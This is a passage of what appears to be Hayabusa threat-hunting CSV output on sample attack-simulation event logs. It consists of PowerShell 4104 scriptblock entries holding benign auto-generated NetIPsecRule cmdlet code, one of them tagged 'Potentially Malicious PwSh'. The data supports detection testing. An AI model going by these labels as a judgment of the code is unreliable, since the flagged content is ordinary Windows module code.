$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_quer",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"yBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecRule' -Alias '*' function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"yBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecRule' -Alias '*' function Copy-NetIPsecRule { 